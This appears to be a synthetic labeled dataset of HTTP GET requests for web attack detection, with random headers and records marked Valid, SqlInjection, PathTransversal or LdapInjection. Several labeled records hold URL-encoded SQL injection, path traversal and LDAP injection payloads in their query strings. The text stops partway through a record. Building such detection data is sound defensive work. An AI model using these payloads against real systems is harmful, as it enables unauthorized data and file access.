GET /q6gXkBVyL6I6/Bx6mjHVmU/t0es8Niz1bl64sr/eishhjeleghUpt3on/atbocdnssfeb/e4tiwvenofsqSn9ql/iWIEOc.msf?aen=%27+%2F**%2F+OR+++++%2F**%2F+++++%27srjiuhku%27+%3E+%27S&iUjb=t&ce=28458903&otcriRpele=0wbNvbscript%28wgtdkws&CXzdin_JTz5gT=%3DEorethi3Set&bodydxechonph-Z=oBs&eieneNlnt=acleirlct&betweenA7CF4aAph4j=0 HTTP/1.0
Host: www.h5edb.gov
Connection: keep-alive
Accept: text/plain, text/plain;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 122.67.58.101
Cookie: Angr62iado=tta;i4heotit7Eaua=244287;7riilaah=ybdenii 8uost;eaon=eQsv7rJ3is;cer1u4oemearals=t8l
Cookie2: $Version="873"
Date: Sat, 23 May 09 15:51:22 UTC
ETag: "UVxosaB2xCH2mpUKt0jR"
Expect: crar=tsunz
From: lehFo@eioiwni.cz
If-Modified-Since: Fri, 07 Oct 05 13:06:57 CET
If-Unmodified-Since: Sun, 24 Dec 06 16:24:38 CET
If-Match: "-Ls_agbPEl6Cu_f1aFi"
If-None-Match: *
If-Range: Fri, 24 Mar 06 20:06:15 UTC
Max-Forwards: 68
MIME-Version: 8.7
Pragma: z='qteMeon'
Proxy-Authorization: Basic cmllaHR0YnQ6dHJlMg==
Authorization: Basic MGFlbG9jOm90MTlpaA==
Range: -69404,-1
Referer: /xnAccmit.php4
TE: gzip;q=0.0,chunked;q=0.3
Trailer: Cache-Control
User-Agent: mmrtitxojot
UA-CPU: 68000
UA-Disp: 570,952,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0666x357
Via: FTP/1.1 www.ogpmezrt.png, FTP/3.6 7.244.113.250:1
Transfer-Encoding: compress
Upgrade: mer/2.9, hitWop/2.4, vtjw/1.7, otte/3.2
Warning: 878 www.6sn3l.shtml "noyalXfnbpe" "Wed, 14 Sep 05 14:01:16 CET"
X-Forwarded-For: 208.165.185.87
X-Serial-Number: 81915611891
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41748
Start - Id: 22627
class: Valid
GET /eSlUSqibr/8d_openbhHC/sLcLT3zWLv5yDX.css?5erooEr=nCs HTTP/1.1
Host: 160.44.191.176
Connection: ot6l5
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.2
Cache-Control: max-age=7
Client-ip: 158.13.254.69
Cookie: .d5.-V5j=t=;rsPovaliIehIeu=42;yyenix4cu=tpy
Cookie2: $Version="84"
Date: Mon, 24 Jan 05 07:45:02 GMT
ETag: W/"cUnGLaaSXEnKtn8o"
Expect: 100-continue
From: 4tEywso@ngmrMaatec.st
If-Modified-Since: Sat, 11 Mar 06 08:00:20 CET
If-Unmodified-Since: Thu, 27 Mar 08 23:13:19 UTC
If-Match: "Na9BEJk_9Y-eYQyRm8"
If-None-Match: *
If-Range: Wed, 25 Feb 04 21:52:18 GMT
Max-Forwards: 12
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic aGVvZW46MWRjMWVo
Authorization: NTLM cGl1ZUlsaWlmbkVvbWtUdGlub3RtZXNvZjlzZWlleXI0ZQ==
Range: -43745
Referer: /eoorgpE/iwpvti/rsnv/dhdosyv.sh
TE: trailers,deflate;q=0.2,gzip
Trailer: Accept-Encoding
User-Agent: i6m3IcD8G http://www.ubfUibrb.cz
UA-CPU: Sparc
UA-Disp: 0852,741,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 353x5479
Via: 9.2 www.nhas.tiff, FTP/3.9 www.4ub3bp.tiff, 8.4 139.77.208.57
Transfer-Encoding: nltu
Upgrade: atr/6.0, rel8/5.7, Taa6/8.7, mkeoa4/7.0, osqs/2.3
Warning: 281 www.inNer.css "4tJ3dtF" "Sun, 01 Nov 09 07:54:39 CET"
X-Forwarded-For: 23.196.24.89
X-Serial-Number: 705834569346
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22627
Start - Id: 42630
class: SqlInjection
GET /tbF5X05FFiC3z/n8Uyxsaibeoms4r.aspx?euatuaAF8hlae=1657+++++or+id%3E3+++++or++ls_id%3C302 HTTP/1.1
Host: www.ftnsl5lnii.biz
Connection: iocnnl5
Accept: application/zip
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 66.231.160.175
Cookie: KTddmd=(|CeinserthgdRandwn;ao=lmochatmp>2;cJLUz=nkS/nodeswftpRbn;rcOe1rt= a3A jebody;bg=06932
Cookie2: $Version="78"
Date: Sat, 13 Mar 10 03:11:35 UTC
ETag: W/"6g2CgBxyxaxVfRuImC"
Expect: lbwt=9tnte
From: ik3a@umddedDee.biz
If-Modified-Since: Fri, 15 Jul 05 16:55:14 UTC
If-Unmodified-Since: Mon, 09 Aug 04 22:26:17 GMT
If-Match: "zp4dB826AD8r00J"
If-None-Match: *
If-Range: Sat, 21 Jan 06 22:56:28 CET
Max-Forwards: 769
MIME-Version: 3.2
Pragma: o='pgm'
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: Basic Y2lydG9hOmVubGw5N2c=
Range: 72326-9838
Referer: http://Hiqob.net/ioo1esr/tti2Aa/ascar/eonnRUe.cgi
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/0.9 (X11; U; Linux i386 3.4; ih-Fl; rv:5.3.5) Gecko/97330403
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4720x346
Via: 1.7 www.eo7ett4.js:3, sfhW/5.8 246.62.208.179
Transfer-Encoding: identity
Upgrade: xpnlin/0.7, nrmbin/0.8, 1tn7c/8.2, 0Hj/3.5, v2sh/4.3
Warning: 746 125.14.120.8 "Ooss" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 81024686129
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42630
Start - Id: 31582
class: Valid
GET /eoe8eveihsrhW/adtebwansrtiyak/s6ngheimAg0te/hisab9l9hetnpl/0dsi/0qn.RQpj0dZrjF/ZMgexecqPOc3/4KBB58FCAB/SwgetLPONFK.autoexec-0/rNiaa.jsp?dipR=199444&idosbet=lils3nTtg&iwb=e83las1&x-L5G=ldcRbaf-&dteejtpnihn2nnt=191 HTTP/1.1
Host: www.olzAar.net
Connection: close
Accept: video/*, video/quicktime, audio/*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: gzip;q=0.8, compress, gzip;q=0.5, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 113.152.255.178
Cookie: NTmisenabIat=566;7h1ecr=71386
Cookie2: $Version="6"
Date: Fri, 20 May 05 02:33:19 UTC
ETag: "CuscIHK5cT3kf6Hm"
Expect: r9nro5=3c73llsf
From: RtEis@avfE9.de
If-Modified-Since: Sat, 17 Jul 04 15:56:46 GMT
If-Unmodified-Since: Sun, 11 Sep 05 16:22:58 UTC
If-Match: "sAnjUtxYW4zt3Y1hU"
If-None-Match: "jowfQH21ip_VmeEMYsPO"
If-Range: *
Max-Forwards: 90
MIME-Version: 6.5
Pragma: 0eaqr=esn
Proxy-Authorization: Digest opaque="oesucl"
Authorization: NTLM NEZuT3RSZ0lSOGRsdGFhaTNFc2xpNnJoZGRvaHRycnNicnFITU82bE8=
Range: -40023,010285-,775998-
Referer: http://www.t0Knebth.fr/omAe.php3
TE: gzip,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/6.4 (X11; U; Linux i586 3.9; ng-kt; rv:2.6.7) Gecko/82349095
UA-CPU: PowerPC
UA-Disp: 165,316,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 951x498
Via: 0.9 www.nTuire.png:78, 5.5 www.menr.jpeg
Transfer-Encoding: gzip
Upgrade: 13nw/2.3, boittr/0.2, wehuPi/3.1, zbnegf/5.6
Warning: 067 www.best.shtml:07 "d0hsk" "Fri, 17 Nov 06 15:02:05 UTC"
X-Forwarded-For: 190.159.59.68
X-Serial-Number: 9453727833196
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31582
Start - Id: 41663
class: SqlInjection
GET /od5OFemm/ttdrkooecyrces/d-exgp_UPCFpb/i5/ocqlothuvpchilahpt/G0@Bstdin6_/2bM-d4hIbDIlMOlc1s/thfnek/eXRZLOCSFQGh/b8Xm-k.gif?selectscriptwp-Aopendjlw=Jr&enos6eWo6ehrn=%27%29+UN%2F**%2FION++ALL++++SEL%2F**%2FECT++%27detbRyTt%27%2C3%2C78972%2C%27hyz0e1eit%27%2C9++FROM+hkio2t+++++WHERE++++%28+++%27%27%3D%27&sdca02egl5xno=q%3C&etBnd7=4958051489&sock_streamxb3Qkyphw=rinsertduofn8+i%7ECpze+3p&fskEthct=gdkcocatnneru1uiEt&datssmeik=2798985388&odta0gs=t0&ttfynairitri=1625777625 HTTP/1.0
Host: www.a5tni9dea.gov
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-icelandic;q=0.8, utf-7;q=0.1
Accept-Encoding: *
Accept-Language: agtnes-inctd, malcy-lsQlzpr
Cache-Control: no-transform
Client-ip: 239.57.78.114
Cookie: dns=5769863
Cookie2: $Version="29"
Date: Fri, 18 Nov 05 06:22:12 UTC
ETag: "FH8-9ZBlEp69RKFe"
Expect: tdqm
From: xwDNo@mseaaa.st
If-Modified-Since: Wed, 31 Mar 10 02:20:40 UTC
If-Unmodified-Since: Sat, 03 Oct 09 09:29:46 UTC
If-Match: "dnilOY1YiiW6ngU"
If-None-Match: "iPWt3SVefv-fKlN"
If-Range: Sat, 24 Nov 07 20:14:20 GMT
Max-Forwards: 846
MIME-Version: 3.1
Pragma: Ao6rrxo='qal7o8t'
Proxy-Authorization: ewnBd ycpeari1=oiYepi
Authorization: Basic dnd0cW56OnRzZGxjYThh
Range: 8646-84,-596087,4-03835
Referer: /tpoal.ace
TE: trailers,deflate;q=0.7
Trailer: If-Range
User-Agent: Mozilla/4.5 (Machintosh; U; PPC 2.6; ed-i2; rv:0.6.6) Gecko/52803720
UA-CPU: MIPS
UA-Disp: 4417,837,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 232x3893
Via: 4.7 www.mref.jpeg, 6.5 www.rlnm.css
Transfer-Encoding: compress
Upgrade: btae/4.5, tttO/9.7, eOni/0.4, osssa/2.4, rdi/6.6
Warning: 530 32.109.118.103 "hOGeuun3sa018i" 
X-Forwarded-For: 236.249.18.77
X-Serial-Number: 611965021882313
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41663
Start - Id: 27606
class: Valid
GET /7@iE6yuVI4h_/nodeeXF7EbsJn@/6yad9ltatn/wtmpu5qxqoKp6Y2/w@_@phMdk4t/i1CyDl./shrqaesstet/TK/l9pD5v4tdoomoet8n8h.shtml?l5ol7ztl7tcexi=laxtermo+&lftc=5311175&ntldhne7elennla=ahttpuai%5CrlZs&osddvLce=%25uLekstdint1+w+duw&yeitbmhneosmm=3680&xEshEnptms=nfromcW&iyadyAi5e=odp%25oo%3Bi%7EeEt%3E&LW8mcLjL._Zu=uahttps&iYe=kioa7as HTTP/1.1
Host: www.cro1gR.biz
Connection: close
Accept: text/*, text/plain;q=0.5, audio/basic;q=0.3
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: *
Cache-Control: max-stale
Client-ip: 41.242.218.70
Cookie: i9h=\o;adbekOsvjrrt=450293;damaoaDxi=erpeHYYDegqX;1wtgtrN=tYd9r8BqioGk
Cookie2: $Version="70"
Date: Sat, 10 Mar 07 11:49:57 CET
ETag: "Eu7Q461aaH3uoWF2kp"
Expect: 7ieoel
From: oieTnE@t0eayas.com
If-Modified-Since: Wed, 15 Mar 06 11:43:36 GMT
If-Unmodified-Since: Mon, 06 Jun 05 06:34:58 UTC
If-Match: "waeY9V9YaP4qlaVqg"
If-None-Match: *
If-Range: Mon, 24 Jan 05 11:04:42 CET
Max-Forwards: 1097
MIME-Version: 9.4
Pragma: tatromLw=ose
Proxy-Authorization: NTLM dHRmdHRhb3JvYWVSbmVlZWRtdHNvb2RDOW50bnJlaW82dHdObjBlbA==
Authorization: Digest nc=DCc85aba
Range: -14,870-,8-96271
Referer: /nmhhaN.cfm
TE: gzip;q=0.7,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/9.3 (compatible; ctnNtnuem; SunOS sun4u; cirnnN; hw3ro)
UA-CPU: x86
UA-Disp: 368,095,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0162x7942
Via: 1.3 194.231.178.5
Transfer-Encoding: identity
Upgrade: iro/0.9, dcset/6.0, xNs9ee/6.4, 9eaii/4.5, msw/6.6
Warning: 292 30.176.242.223 "IaZ49eusrm" 
X-Forwarded-For: 177.184.78.1
X-Serial-Number: 189697977036477
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 27606
Start - Id: 41642
class: SqlInjection
GET /zi/e2MloVhIYwyw/6vPYslVOA7Qi/yselwrl7/odnaioinahtryprrtps.jpeg?.DMA9zBhtacces=t0ie&mkkcdocumentaMcc3J=a5odaMpcnnc&reeolsi=efqzuWL8ZHb&oraha3aArgmoA9=%3B+exec++++get_cust%28+%27x%27%27++union+select++++object_name%2Cobject_type%2C%27%27x%27%27+++++from++++user_objects+where+++%27%2798ion%27%27%3D++++%27%27++++%27++%29%3B&sVNHyHZG=r2esystemT&teshwfn=s6uhybeinitn9smfe&tSIoEhHrxtTsht=7881517&vZID1C.z4=2952647010 HTTP/1.0
Host: www.itcneeTeai.st:80
Connection: close
Accept: video/mpeg, text/*;q=0.7, audio/x-wav
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: 6eorst-lowf6rt9, lH-nr2iEei, rr-mx5lt;q=0.8, asEe-xqao8u
Cache-Control: max-age=5
Client-ip: 94.45.7.230
Cookie: dhdsnMmmketou5=306525;access_log4nba=036139132;he6jj0ineberRf=cprda
Cookie2: $Version="401"
Date: Tue, 06 Dec 05 18:50:51 CET
ETag: W/"X.GGG2fHr8JXo7I"
Expect: 100-continue
From: vlIol@haea.org
If-Modified-Since: Wed, 02 Nov 05 08:26:08 GMT
If-Unmodified-Since: Thu, 12 Apr 07 15:53:26 CET
If-Match: "Vpnm6_tx@bTkEsTmda"
If-None-Match: "TZlZS0tDeL5762D4jDCA"
If-Range: Sun, 12 Dec 04 20:16:01 GMT
Max-Forwards: 6
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM bG5sc2NhT05hdHJyZnVhRWljaWVub3B4eThwc2hUaWhocmgxb2FnYnRiMXo1dw==
Authorization: NTLM bmlkZHRkOXNoZGU3dGJ2c2RiZXJQOWEwZXRvbW9lZnNvUlBONQ==
Range: -11289
Referer: /whrnGloC/dapot.conf
TE: chunked,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/4.3 (Windows; U; Win98 0.0; 9r-lh; rv:7.5.6) Gecko/76616479
UA-CPU: Sparc
UA-Disp: 041,9154,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 064x464
Via: FTP/2.3 www.iUwad2.jpg, 2.7 234.0.224.228, ryrhn/9.3 www.yost.tiff
Transfer-Encoding: gzip
Upgrade: liaory/2.2, awo4ag/4.5, oil/7.5, ctOl/2.3, see/4.6
Warning: 419 www.riae.jpeg "t4xtspnneyygypw1bdf" "Thu, 20 Aug 09 21:25:22 GMT"
X-Forwarded-For: 239.30.161.125
X-Serial-Number: 215683669428
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41642
Start - Id: 23054
class: Valid
GET /6Qmebm/eeidt/uhTem2odrshs/se8ltkrTaoE/stoWaj5i4oat9/sH@3Py/eieiuTsEstedo/IfGumochaXTJ2/lonovd5n1rcaurnnimEe/exTO_.uY@NKYBTy.js?oa=u%2Btdt+ue&ulwrs=1PRB&Ennef4wj8Cdd=msr&drop5fhttpA.BaqIgH=a9rhtpass%3D&o3te=4841&rs=rtssosa&hl=05908&aonchodLrznniE=lddain0Thh0qa HTTP/1.0
Host: 209.68.94.130
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 214.86.17.4
Cookie: eVusceauimcls=9019
Cookie2: $Version="511"
Date: Fri, 22 Jun 07 04:59:22 GMT
ETag: "7qUh3CQVD7qRGZjvNt"
Expect: 100-continue
From: sAahmw9m@oemr3xo.uk
If-Modified-Since: Thu, 18 Nov 04 06:29:45 UTC
If-Unmodified-Since: Sun, 31 May 09 03:20:26 CET
If-Match: "FcJBb3M@oSuHO@."
If-None-Match: "uw-YdA.YTxd2H_5BbZV"
If-Range: ".mBckE2d93YBEsHRF"
Max-Forwards: 7
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: te3gi lgiorr=rcre
Authorization: NTLM cjFtQm1jRDRlZWJmYjdvc2hydGxpOWV2YVFiZXhzaHRlcnRuN2Y3ZG9jdw==
Range: -41
Referer: http://www.zrsest.de/QNtyitmn/texnnlhr/2ard/obbihau/kistb26.php
TE: trailers,trailers,deflate
Trailer: Authorization
User-Agent: Mozilla/4.3 (X11; U; Open BSD i586 7.0; la-ea; rv:8.0.0) Gecko/29489810
UA-CPU: x86
UA-Disp: 8779,521,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 869x269
Via: FTP/1.3 150.234.189.176:09
Transfer-Encoding: deflate
Upgrade: ncdhiw/3.5, oaki/2.2
Warning: 007 www.oobensO.tiff "sn6eP" 
X-Forwarded-For: 239.44.113.150
X-Serial-Number: 103102
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23054
Start - Id: 44742
class: PathTransversal
GET /HB/8dtngtoyTt1aeSoaiit/cdvmdi4enBzenra61aR/ehzvhd8E8-m5z/cNBb/iwatesrtigempotbl/ar/uuiBO1ng/5iwrEitablaO0b6ht/hbhbs/sXXdn7DA1.jsp?endy=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml&yrsGAf=selectho0arneiszanede&ere=qconnect+%28ricexecprocessing-instructionpaeiaT6&suByoWn=%7EN4et&3l3FCeminputSQF=uy%40LdX&ldte4elT=97843723 HTTP/1.0
Host: 149.176.48.64
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: U-yhe2hds;q=0.8, 5s-RlEsl5H, q-satlLost, b-af, t-h
Cache-Control: no-store
Client-ip: 239.84.56.120
Cookie: yswjvo=gZgi7;wclYsnyeeyqreo=i1rtn
Cookie2: $Version="152"
Date: Wed, 04 Aug 04 11:57:04 GMT
ETag: W/"yL4GXeSmQVWeS4c"
Expect: aet1=tb4aTmn6
From: p3teud@syl6D.biz
If-Modified-Since: Wed, 06 Feb 08 05:16:45 GMT
If-Unmodified-Since: Wed, 11 Jun 08 17:16:14 UTC
If-Match: *
If-None-Match: "S-F81SlC_ZZIHC9Pnp"
If-Range: Mon, 29 Sep 08 18:52:22 UTC
Max-Forwards: 8
MIME-Version: 4.7
Pragma: thhhehno=suTi6wo
Authorization: Basic dUxpZGtpOXk6ZWVvMW5lNm0=
Range: 218-,38304-
Referer: http://ogosA.biz/hc7cprbl/nl00/e1nme.tiff
TE: gzip,trailers,deflate;q=0.6
Trailer: TE
User-Agent: Mozilla/2.5 (compatible; iaip; Windows NT; tijmeereo; eiPtgeapt; bnitne)
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 7624x8326
Via: Ieukni/7.3 www.Iksh.jpg, FTP/8.6 www.go795Ci.gif, HTTP/7.2 69.246.49.53
Transfer-Encoding: gzip
Upgrade: y9uo/8.1, 6tTo/8.6, sd1ve/9.7, OmipFw/5.0, Xew/1.5
Warning: 438 www.rsk9th.shtml "do9iaoemswqhy" 
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 7113830026427564096
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44742
Start - Id: 45914
class: PathTransversal
GET /3I6/erittT0eeAan/Ri/lm8ieteewtrroMthhne/bjMR0@C1JG.jLWN_qT-/3swraseSeoeerie3e/sd10Nz7Epassthru/Zrmpositionmhtacces1L/eAWGgDWcs3km52v0f@/imieiitBniee3.php3?1e0o=inatsalocationdwhert+&ttdaf=%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Felnt%2Fat%2For%2Fleve.cfm HTTP/1.1
Host: 164.107.181.57
Connection: pGojotiC
Accept: */*
Accept-Charset: windows-1250, windows-874, iso-8859-4;q=0.9, iso-2022-kr
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 90.133.156.2
Cookie: HEiso=gkj3;j5PY9x1IC=en=>
Cookie2: $Version="230"
Date: Wed, 14 Jan 09 15:34:58 GMT
ETag: "F9XeIBzlGuOQhpHd7UtM"
Expect: 100-continue
From: sdns@tal3sea.gov
If-Modified-Since: Mon, 24 Jul 06 14:41:11 CET
If-Unmodified-Since: Tue, 13 Mar 07 16:06:10 CET
If-Match: *
If-None-Match: "x4UZPb7.Tnqd-Ny1v"
If-Range: *
Max-Forwards: 23
MIME-Version: 1.5
Pragma: ya=aua
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: oeAbas b0Re=adrkl8ih
Range: -106180,0973-,3598-
Referer: http://www.ihHiNhe.fr/ehp5/hytsP8/utawrehe/n01ei52O/qsttglik.php
TE: trailers
Trailer: TE
User-Agent: wtcco/9.5
UA-CPU: 68000
UA-Disp: 1794,840,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4595x1071
Via: HTTP/3.4 www.r9rld09u.htm, 2.0 www.giOe.tiff
Transfer-Encoding: gzip
Upgrade: fes/4.2, eismN/3.9
Warning: 095 56.21.175.106:259 "l0gwyrihdtorxlLesCEm" "Thu, 01 Mar 07 09:16:13 CET"
X-Forwarded-For: 210.181.84.191
X-Serial-Number: 9152638367
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45914
Start - Id: 23555
class: Valid
GET /WhcWFeBhtmpSvUNp/uifjan7dstflojxg/AuU/sU/ojuopvy9CyAW/idpGbetweenv60-acceptXOI39n/oEW9icLOt/t1K/br.swf?m0atuaO=a5Ebgsoundqea&AvOR=rlTShetjihc6c&gallIiVTe2=041367&tsTidjparnh=%29zeoa%26fpo&PK3uuHdo7onfeqs=1351413&oaCaposnp=l14sf&gsoir8bE=einnr%40gtiyuwelocation&2cstdinGH%uY=26&tri6iEehaee=buwinnt0djit%2Fz%29c0%3Fiep&act7zvsoooBhsav=oygtetbiufOe&heori=%29r%29&moofshe=ewXQ&cc626w=tsn%7EdropXi+w8yecsock_streame HTTP/1.1
Host: www.t0mm.org
Connection: ohtz
Accept: */*;q=0.7
Accept-Charset: x-mac-cyrillic, cp-932;q=0.0, iso-10646-ucs-2;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale=9
Client-ip: 127.91.158.136
Cookie: 9B-M=5138469573;oehsr7issOrs1to=eal5 ;sededfyrto=28;ote0grdeMn=7827957;lerka=nirrd
Cookie2: $Version="42"
Date: Sun, 12 Mar 06 10:16:55 UTC
ETag: "0.SHwn06hq2i6qnlE"
Expect: t2erc=irB5;roAq2sbc
From: dlrken@iluelhlan.cz
If-Modified-Since: Sun, 02 Apr 06 24:33:01 CET
If-Unmodified-Since: Wed, 05 Dec 07 02:59:16 GMT
If-Match: "wQk3VeZanO4wfr9XKH7"
If-None-Match: "COWl@@tcLmaG0xQ"
If-Range: Tue, 02 Mar 10 15:16:37 GMT
Max-Forwards: 26
MIME-Version: 2.1
Pragma: trtn=aexez
Proxy-Authorization: Basic dHJhSTppdDRkQWloaQ==
Authorization: NTLM cnI4aUx6b3ppbmZ0Mm9hYnNmaGc3Ym90aGllaW5vZWFlMGh5OXBlZWFsbjN0
Range: 9-582047,9-,23678-00
Referer: http://www.wyat.com/Cteha/twLentHz.swf
TE: chunked,chunked;q=0.5,deflate;q=0.6
Trailer: Referer
User-Agent: Mozilla/3.3 (Windows; U; Win 9x 9.1; ha-1i; rv:1.1.9) Gecko/85852485
UA-CPU: StrongARM
UA-Disp: 990,4504,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 4426x0282
Via: HTTP/3.4 188.106.42.31, 1.1 29.26.224.245, FTP/5.7 139.206.222.147:1
Transfer-Encoding: identity
Upgrade: wsepm/7.5, 5aaet/0.7, No5jm/7.8, gbfr/4.3
Warning: 057 171.242.44.170 "dk3ioh" "Fri, 22 May 09 19:56:39 GMT"
X-Forwarded-For: 11.102.20.4
X-Serial-Number: 74768537554574
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23555
Start - Id: 18212
class: Valid
GET /at/7-cMsstdineJ@AU/nl6hnthemextqibs/Loh89HHDD2/heEfT/3r6mmZsZ/dvgAvWh_6Fu.x19R5kE/eh_VMOWd45n/tzqydm/tFoouwer.exe?ecorDaw=Tzc HTTP/1.0
Host: 149.47.18.237
Connection: j8avd
Accept: image/jpeg;q=0.6, image/gif, application/zip;q=0.2
Accept-Charset: windows-1251, x-mac-arabic;q=0.9, windows-1254;q=0.8, iso-8859-2
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 18.171.181.243
Cookie: intnnLweraec=eic;wEKDiutfantttn=\TtAbdgni
Cookie2: $Version="451"
Date: Sun, 14 May 06 09:09:35 UTC
ETag: W/"kbsG2wxTIYHzOzT-h"
Expect: shsz
From: oritsj@i639iid.org
If-Modified-Since: Fri, 30 Jan 04 09:20:42 GMT
If-Unmodified-Since: Fri, 11 Apr 08 04:47:54 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0352
MIME-Version: 0.5
Pragma: saey='qee3ytn'
Proxy-Authorization: udkE o8jpteaz=eet8ehdn
Authorization: Digest realm
Range: 666465-916
Referer: http://tiFo1v.st/yAnstgca/Oqrxb/nnirbe.tiff
TE: trailers,deflate;q=0.8
Trailer: Trailer
User-Agent: ntdctbuEeNe3cnhle
UA-CPU: PowerPC
UA-Disp: 202,576,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 810x317
Via: 9.7 146.141.142.83:07611
Transfer-Encoding: compress
Upgrade: hicew/7.4, 1ok/5.7, 4ba/6.1, Inm/8.9, hutr/5.7
Warning: 457 249.243.123.227 "ar3gutfzh" "Thu, 05 Jul 07 12:26:34 GMT"
X-Forwarded-For: 164.38.194.242
X-Serial-Number: 8413753908190
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18212
Start - Id: 38096
class: LdapInjection
GET /nTvezferh4duhgpOeen7/3LseeyfceeoIq1i6t7.mspx?uaidexihaatceU=%29++%28+++%7C%28oMif%3Dii7ho*%29&deleteeST=9 HTTP/1.1
Host: 252.216.35.240:309
Connection: close
Accept: application/*
Accept-Charset: x-mac-turkish;q=0.9, x-mac-chinesesimp;q=0.7, iso-8859-6;q=0.8
Accept-Encoding: *;q=0.3
Accept-Language: h2osr-ituqD6o;q=0.6, 6hnse1e-ea5Ugh9s;q=0.1, gatnbgRt-tVSo6;q=0.1, lnrs-emkr
Cache-Control: only-if-cached
Client-ip: 209.94.206.107
Cookie: 3yy8=- c
Cookie2: $Version="433"
Date: Wed, 03 Dec 08 18:28:46 UTC
ETag: ".@oOa6lHm-n1XKovek"
Expect: yzytf=wi36hMoe
From: ehldyeiL@ertsuha.st
If-Modified-Since: Mon, 27 Aug 07 24:58:53 CET
If-Unmodified-Since: Sat, 03 Feb 07 07:20:13 UTC
If-Match: *
If-None-Match: "7uUEgZHOE@Xa-@h6r"
If-Range: *
Max-Forwards: 803
MIME-Version: 9.4
Pragma: Tcj=rt
Proxy-Authorization: atswre uFty=o9ssf
Authorization: Basic YWVBaXVFOnNsZWxyMw==
Range: 943633-,-798,-667
Referer: http://www.liiig.org/gnsmz.pdf
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/2.1 (X11; U; Open BSD i386 7.5; ui-0u; rv:8.8.8) Gecko/00007402
UA-CPU: 68000
UA-Disp: 119,1491,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3700x2595
Via: 6.8 177.60.252.111, 4.2 www.arrzt.css:8512, 5.0 241.22.114.3:419
Transfer-Encoding: attp
Upgrade: ttyt/8.2, cspny/5.6, dpX8/2.9
Warning: 074 www.5loeg.jpg "2ers1" 
X-Forwarded-For: 42.181.165.201
X-Serial-Number: 2885123328233620
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38096
Start - Id: 25614
class: Valid
GET /mksoin/aZm.htm?HNSWgroup by=a6e%3BR&tsae5rmkr=it&Od7wedmrr8=hUoc&svae5kainei=enC&1IUgHv2ts_-=s8tteenwp&oadrotaue=161759&ans0nn=ehIliritetpeRNO&K@uloIUOWSVP=iiei+tr%3D%3Fh&Ia3ene=c8pvKib&ah=oSligmtnAufe HTTP/1.1
Host: 30.197.148.19:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: utf-7
Accept-Encoding: *
Accept-Language: iiei-u, hla-efeZr
Cache-Control: max-stale=555
Client-ip: 86.20.85.20
